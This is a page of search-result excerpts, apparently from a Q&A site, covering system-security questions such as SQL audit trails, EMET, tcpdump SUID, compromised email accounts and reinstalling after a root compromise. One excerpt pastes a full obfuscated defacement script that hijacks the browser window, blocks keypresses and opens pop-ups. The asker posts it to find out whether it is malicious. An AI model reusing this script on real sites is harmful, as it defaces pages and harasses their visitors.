Search Results

Search found 14771 results on 591 pages for 'security policy'.

Page 139/591 | < Previous Page | 135 136 137 138 139 140 141 142 143 144 145 146  | Next Page >

  • Best practices for SQL Server audit trail

    - by Ducain
    I'm facing a situation today where it would be very beneficial to me and my company if we knew who had logged into SQL and performed some deletions. We have a situation where at least 2 (sometimes 3) people login to SQL using SQL Server Management Studio, and perform various functions. What we need is an audit trail. If someone deletes records (mistakenly or otherwise), I'd like to know what was done. Is there any way to make this happen?

    Read the article

  • Is there a way to check if a user has specific rights?

    - by Vadim
    In my application I'm using ntrights.exe, that is part of Windows Resource Kit, to grant and revoke a specific user right. For example to grant a user "Log on as a server" right, I execute using shell object following command: ntrights -u User +r SeServiceLogonRight However ntrights doesn't allow you to check if a user has a specific right. Can you tell me how I can check if a user has a specific right?

    Read the article

  • How to keep Flash secured with EMET?

    - by Indrek
    I use EMET to secure a number of applications on my computer - web browsers, Office suite applications, PDF readers, as well as Adobe Flash. Overall it's working great, except that the Flash executables contain the version number in the file name, so every time there's an update, the file names change and I have to remember to re-add them manually to EMET. Is there a way to streamline this process? EMET does support wildcards, but only in the path itself, not the file name, so something like %windir%\system32\Macromed\Flash\*.exe wouldn't work. Is there any other way to add a whole folder to EMET so that any new executables in that folder are automatically secured?

    Read the article

  • Which is the most independent and secure email service? [closed]

    - by Rafal
    I'm looking for a provider with a secure transfer protocol (like https) Secured (as much as it is possible) from being hacked or spied on. One that won't scan my email in order to display more accurate ads. One that won't sell my personal information. One that won't disclose my emails to some sort of government (it probably must be based outside of US or Chinese jurisdiction I reckon) Encrypted if possible. It can be simple and without huge storage. If you know/use any similar service I would be really grateful if you could point me there. Cheerz

    Read the article

  • A possible case of hacked email account. What kind of an attack is this?

    - by Rickesh John
    I own a Yahoo mail account. I am using this account for sending resumes and receive notifications from various job portals. But yesterday, I found that some 10-15 mails had been sent to random addresses from my account. Most of them had this format: hr@<companyname>.com I am pretty sure that I didn't send any mails to such addresses. Initially, I thought the job portals may be sending mails on my behalf and Yahoo is logging them, but then I saw the contents. The contents of all those mails were a URL, which I did not click. SCARED. Also, to top it off, my "Sending Name" has been changed to 'Nice Maria'!! o_0 I have taken the necessary measures and changed my password and the secret question. I cannot delete this account as this email is registered with all the job portals and other companies. Is this a simple case of my account being compromised or was I a victim of some web vulnerability? All the mails seem to be bot generated, with only a URL as the message body. Please advice.

    Read the article

  • USB key to pass password in Centos 6

    - by Andrew
    I had a room mate that put a livecd in my desktop and looked around on my machine. I caught him in the act and threw him out. I haven't had a room mate for a while now and so as to avoid the livecd issue again I encrypted the hard drive, the machine is running centos 6.3. Is there anyway that I can avoid typing the password in each time if I have usb key in the machine to feed the password to the system? Additional question. Is there anything you can suggest to solve the problem I have ? Thanks

    Read the article

  • Is there a serious issue with setting the SUID bit on tcpdump?

    - by Dean
    I'm running tcpdump on a remote machine, and piping the output to Wireshark on my local machine over SSH. In order to do this, I had to set the SUID bit on tcpdump. For background, the remote machine is an Amazon EC2 running "Amazon Linux AMI 2012.09". On this image, there is no root password, and it is not possible to log in as root. You can't use sudo without a TTY, and therefore you have to set the SUID. What are the practical risks of setting this bit on tcpdump? Is there any need to be paranoid? Should I unset it whenever I'm not capturing?

    Read the article

  • Best way to find the computer a user last logged on from?

    - by Garrett
    I am hoping that somewhere in Active Directory the "last logged on from [computer]" is written/stored, or there is a log I can parse out? The purpose of wanting to know the last PC logged on from is for offering remote support over the network - our users move around pretty infrequently, but I'd like to know that whatever I'm consulting was updating that morning (when they logged in, presumably) at minimum. I'm also considering login scripts that write the user and computer names to a known location I can reference, but some of our users don't like to logout for 15 days at a time. If there is an elegant solution that uses login scripts, definitely mention it - but if it happens to work for merely unlocking the station, that would be even better!

    Read the article

  • Failed to generate a user instance of SQL Server

    - by Goondocks
    I'm using Windows 7 Beta and trying to install a web application locally. This web site uses Microsoft SQL Server 2005 Express (SQLEXPRESS) and a MDB file in the web site's ~/App_Data folder. I was instructed to configure IIS7 to use Classic .NET AppPool for this web application. Each time the web site loads, I receive the following error: There was an error trying to connect to the Database Server: Failed to generate a user instance of SQL Server due to failure in retrieving the user's local application data path. Please make sure the user has a local user profile on the computer. The connection will be closed. The Internet is packed with articles written on this subject. The prevailing wisdom seems to be: Configure the SQL Express Service to use the Local System account. Delete the following directory: C:\Users\username\AppData\Microsoft\Microsoft SQL Server Data\SQLEXPRESS Neither of these fixes have made any impact. I have tinkered with permissions and settings for hours to no avail. Can anyone suggest a fix or help me understand how to get more detailed information about the problem.

    Read the article

  • Reinstall after a Root Compromise?

    - by Zoredache
    After reading this question on a server compromise, I started to wonder why people continue to seem to believe that they can recover a compromised system using detection/cleanup tools, or by just fixing the hole that was used to compromise the system. Given all the various root kit technologies and other things a hacker can do most experts suggest you should reinstall the operating system. I am hoping to get a better idea why more people don't just take off and nuke the system from orbit. Here are a couple points, that I would like to see addressed. Are there conditions where a format/reinstall would not clean the system? Under what types conditions do you think a system can be cleaned, and when must you do a full reinstall? What reasoning do you have against doing a full reinstall? If you choose not to reinstall, then what method do you use to be reasonably confident you have cleaned and prevented any further damage from happening again.

    Read the article

  • What could cause these "failed to authenticate" logs other than failed login attempts (OSX)?

    - by Tom
    I've found this in the Console logs: 10/03/10 3:53:58 PM SecurityAgent[156] User info context values set for tom 10/03/10 3:53:58 PM authorizationhost[154] Failed to authenticate user (tDirStatus: -14090). 10/03/10 3:54:00 PM SecurityAgent[156] User info context values set for tom 10/03/10 3:54:00 PM authorizationhost[154] Failed to authenticate user (tDirStatus: -14090). 10/03/10 3:54:03 PM SecurityAgent[156] User info context values set for tom 10/03/10 3:54:03 PM authorizationhost[154] Failed to authenticate user (tDirStatus: -14090). There are about 11 of these "failed to authenticate" messages logged in quick succession. It looks to me like someone is sitting there trying to guess the password. However, when I tried to replicate this I get the same log messages except that this extra message appears after five attempts: 13/03/10 1:18:48 PM DirectoryService[11] Failed Authentication return is being delayed due to over five recent auth failures for username: tom. I don't want to accuse someone of trying to break into an account without being sure that they were actually trying to break in. My question is this: is it almost definitely someone guessing a password, or could the 11 "failed to authenticate" messages be caused by something else?

    Read the article

  • china and gmail attacks

    - by doug
    "We have evidence to suggest that a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists. Based on our investigation to date we believe their attack did not achieve that objective. Only two Gmail accounts appear to have been accessed, and that activity was limited to account information (such as the date the account was created) and subject line, rather than the content of emails themselves.” [source] I don't know much about how internet works, but as long the chines gov has access to the chines internet providers servers, why do they need to hack gmail accounts? I assume that i don't understand how submitting/writing a message(from user to gmail servers) works, in order to be sent later to the other email address. Who can tell me how submitting a message to a web form works?

    Read the article

  • Remote hosts accessing AD's registry

    - by smitty user
    I have a situation here. I have an intrusion detection system and it constantly alerts me that a remote host is accessing our AD's registry remotely. Our remote hosts are mainly Windows XP and our ADs are W2K8. The remote hosts access them over SMB port 445 Is it normal for Windows hosts to access AD's remote registry? My colleagues confirmed with me that both host and AD is clean from virus with endpoint protection enabled. Thanks.

    Read the article

  • If I scp a file through an intermediate server, is the file stored temporarily on the server?

    - by Blacklight Shining
    For the sake of simplicity (I find it easier to remember names than arbitrary letters), I will dispense with letters and use names to refer to the machines in this scenario. Say I have two machines, applejack and pinkie-pie, each on their own separate LANs and not in the same physical location. I also have a server, cadance, with a direct Internet-facing connection. I want to copy a file from applejack to pinkie-pie, so to avoid dealing with port forwarding and such, I set up an ssh tunnel from pinkie-pie to cadance (ssh -R etc cadance). Now I can connect to pinkie-pie from anywhere, by connecting to cadance and specifying an alternate port to use. I can also easily copy files to pinkie-pie with scp -P $that_port $some_file cadance:$some_path. My understanding of how it works is this: A secure connection is made from applejack to cadance I am authenticated to cadance A secure connection is made from applejack to pinkie-pie that spans the existing reverse tunnel and the new connection from step 1. I am authenticated to pinkie-pie Files are copied directly from applejack to pinkie-pie over this connection. Am I correct here? How secure is this approach? If I'm wrong…are files copied this way decrypted at cadance before being passed on to pinkie-pie? Is there a possibility that traces of unencrypted data could remain on cadance?

    Read the article

  • Howt to grant network access to LocalSystem account?

    - by Ian Boyd
    How do you grant access to network resources of the LocalSystem (NT AUTHORITY\SYSTEM) account? When accessing the network, the LocalSystem account acts as the computer on the network: ...and acts as the computer on the network. Or to say the same thing again: The LocalSystem account acts as the computer on the network: When a service runs under the LocalSystem account on a computer that is a domain member, the service has whatever network access is granted to the computer account, or to any groups of which the computer account is a member. How does one grant a "computer" access to a shared folder and files? Note: Computer accounts typically have few privileges and do not belong to groups. So how would i grant a computer access to one of my shares; considering that "Everyone" already has access? Note: workgroup

    Read the article

  • Adding port forwardings programmatically on a ControlMaster SSH session

    - by aef
    I just found out about the ControlMaster/ControlPath feature of OpenSSH, which allows you to use a single SSH connection to run multiple terminals. As I often use SSH to use port forwarding to get encrypted and authenticated VNC sessions I instantly recognized that you can't add port forwardings to a remote server to which you already have an established connection. This sucks. Sometimes later I found out that you can circumvent this limitation by typing ~C in a running SSH terminal session. This opens up a command-line which allows you to add or remove port forwardings. My quesion now is: How can I add port forwardings on an existing SSH session which is using the ControlMaster/ControlPath feature, without the need to have access to a terminal session inside that SSH session. I need this to enable my script which starts a secure tunneled VNC connection for me to add and later remove its port forwardings. (I know I could use a terminal multiplexer such as GNU Screen or tmux, actually I'm doing this already. But I like the idea of using just one SSH session for serveral reasons.)

    Read the article

  • Revert "Deny" permissions in Windows 7

    - by saurabhj
    I made a very dumb mistake and I am hoping there is a way to fix this without having to boot in through a Linux Live CD and extracting the data. My user login to my Windows 7 system is: John John is part of the Administrator's group. I have a folder called "C:\Users\John" I tried to make this folder accessible to ONLY John (and deny from all other Administrators) by going to the Folder, Right Click Secturity tab and then selecting all the checkboxes under "Deny" while having selected the "Administrators" group. As a result, I cannot access this folder from any of the accounts: "John" and "Administrator" as both of them belong to the Administrators groupd and deny permissions out-weigh the "Allow Permissions" Is there any way I could revert this back? Thanks a million!

    Read the article

  • Can an external server be used to encrypt all traffic

    - by Pasta
    My work takes me to a number of places with WiFi connection. I want to be able to encrypt the traffic between my laptop and the internet. Can I do this with a VPN server? What is the best way to get this done? Is there a secure and reliable service that will help me do this? This is fairly important and might be shared by upto 2 people at a time. Is it better to get a server setup on a cloud hosting solution? Amazon?

    Read the article

  • My webserver just got hacked [closed]

    - by billmalarky
    Possible Duplicate: My server's been hacked EMERGENCY My web server just got hacked. It was on a vps so I think it was hacked through another site. When I loaded the homepage it looks like it ran some script. Can anyone tell me if this script is malicious and if I just got screwed by my own website? `<script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><i onclick="details()">TiGER-M@TE</i></font></a></span><br/><br/><script>var l1n3='<img src="data:image/gif;base64,R0lGODlhqAABAOYAAAMDA3d4eAAAAAICAfLy8l5dXaWlpSQlJBwcHBQVFBISEQ0NDbu7u/v8/EJBQePj4/3+/T4+PtjX2Do7OlZWVyEiIjc3N09PT4OEhIB/f/r6+sjIyMTExPb29rS0tHx7fOvr64+Pj4eHh56dnZqZmvT09GVlZejp6dXU1aGhoeXm5khISJKTk93e3hkZGQcHB0RFRBcXF+7u7isqKi4uLmxtbLe3t6ysrXR0dTQ0M87Ozw8QEMvLy6ipqQUFBUxMTAkJCdHS0vDw73BwcQsLCycnJ/j4+JeXl8HBwmFhYVNSU+Dg4Glpadvb2jEwML6+vrCvsB8fH4uLi1pZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACoAAEAAAewgBANGkYdJQRCMiAnKg9LLU0SKEE6PBscSE8MNh5QNz0GKSMkRywhUiIYGR8BOEM1TCZJBVMUShc/KzAOERMWOU40M0UHFVEILjEJCjsLREAvPgADAgIDAD4vQEQLOwoJMS4IURUHRTM0TjkWExEOMCs/F0oUUwVJJkw1QzgBHxkYREgJweIIiREpDPS4AcWDDQZPkHDYwENHEBQSmrRY8kDFCRAyhBAo0cGIhgYQAgEAOw==" />'; document.write(l1n3+l1n3);`

    Read the article

  • How do you search for backdoors from the previous IT person?

    - by Jason Berg
    We all know it happens. A bitter old IT guy leaves a backdoor into the system and network in order to have fun with the new guys and show the company how bad things are without him. I've never personally experienced this. The most I've experienced is somebody who broke and stole stuff right before leaving. I'm sure this happens, though. So, when taking over a network that can't quite be trusted, what steps should be taken to ensure everything is safe and secure?

    Read the article

  • GnuPG Command Line - Verifying KeePass Signature

    - by Stisfa
    I'm trying to verify the PGP Signature of the latest version of KeePass 2.14's setup file against this signature, but this is the output I receive: C:\Program Files (x86)\GNU\GnuPG>gpg.exe --verify C:\Users\User\Desktop\KeePass-2.14-Setup.exe gpg: no valid OpenPGP data found. gpg: the signature could not be verified. Please remember that the signature file (.sig or .asc) should be the first file given on the command line. C:\Program Files (x86)\GNU\GnuPG> I found this command here, but it made no mention about ".sig" or ".asc" files, so I figured I did something wrong. By reading (http://www.gnupg.org/documentation/manuals/gnupg/gpgv.html#gpgv), I further tried the following: C:\Program Files (x86)\GNU\GnuPG>gpg.exe --pgpfile C:\Users\User\Desktop\KeePass-2.14-Setup.exe gpg: Invalid option "--pgpfile" C:\Program Files (x86)\GNU\GnuPG> As you can see, the results are quite obfuscating... I took a look at this on SuperUser (http://superuser.com/questions/16160/short-easy-to-understand-explanation-of-gpg-pgp-for-nontechnical-people - I couldn't use "a href" due to the built in spam filter that discriminates against users with < 10 rep; this is the same reason for the link above this link), but none of the links seemed to really address my question, at least not directly enough for me to get any idea on how to move forward on this. Can anybody here help me with the esoteric technicality of OpenPGP & the associated use of the GnuPG program? I've felt pretty dumb learning VBS, but this is beyond humiliating: it's absolutely debilitating and maiming whatever confidence I had with my IT skills (then again, I have no justification for making any boast either, as I have yet to get my A+ Cert, lol).

    Read the article

  • Implications and benefits of removing NT AUTHORITY\SYSTEM from sysadmin role?

    - by Cade Roux
    Disclaimer: I am not a DBA. I am a database developer. A DBA just sent a report to our data stewards and is planning to remove the NT AUTHORITY\SYSTEM account from the sysadmin role on a bunch of servers. (The probably violate some audit report they received). I see a MSKB article that says not to do this. From what I can tell reading a variety of disparate information on the web, a bunch of special services/operations (Volume Copy, Full Text Indexing, MOM, Windows Update) use this account even when the SQL Server and Agent service etc are all running under dedicated accounts.

    Read the article

< Previous Page | 135 136 137 138 139 140 141 142 143 144 145 146  | Next Page >